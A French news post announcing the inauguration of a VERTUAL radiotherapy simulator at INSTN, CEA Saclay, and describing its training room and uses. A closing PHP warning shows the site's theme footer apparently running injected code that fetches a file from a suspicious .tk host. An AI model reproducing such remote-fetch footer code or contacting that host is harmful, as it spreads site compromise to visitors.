08 oct

Inauguration de l’installation VERTUAL à l’INSTN – CEA Saclay

TD-INSTN_Vertual2014

Le vendredi 3 octobre, le premier simulateur VERTUAL en France a été inauguré à l’Institut National des Sciences et Techniques Nucléaires, INSTN, au CEA de Saclay.

L’INSTN a choisi VERTUAL pour les avantages indéniables qu’apporte le logiciel en matière de formation pour les physiciens.

Le simulateur Vertual représente un véritable intérêt pédagogique, avec une fidélité d’ingénierie et d’environnement – la réalité de la salle – et une fidélité psychologique – la réalité de l’expérience – afin d’enseigner dans un espace sécurisé, sans rayonnement.

Les équipes de l’INSTN pourront créer leurs propres scénarios d’utilisation, qu’ils soient des scenarios de Physique comme de Traitement de patients. Elles pourront puiser sans limite des cas de traitements possibles dans la base de données DICOM.

En outre, Vertual permettra à l’INSTN d’enseigner l’étude des paramètres des mesures physiques en bénéficiant de la possibilité de faire des erreurs en toute sécurité ; puis de voir l’impact des erreurs.

L’INSTN a mis en place une salle dédiée pour la pratique de Vertual la plus réelle possible : L’installation comprend un écran rétroprojecteur permettant une simulation en taille réelle. La salle est entièrement équipée, avec un système son et des écrans de retours. Comme en salle de radiothérapie, l’utilisation se fait par la manette de contrôle de l’accélérateur.

Le logiciel s’accompagne d’une version tablette. La manipulation peut se faire par iPad. L’INSTN a également installé le logiciel sur ordinateur portable afin de pouvoir préparer la formation.

VERTUAL Vert Physics

TD-INSTN_Vertual6

TD-INSTN_Vertual7

TD-INSTN_Vertual3

TD-INSTN_Vertual5

TD-INSTN_Vertual8

 


Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/technolod/www/wp-content/themes/techdev/footer.php(58) : runtime-created function on line 1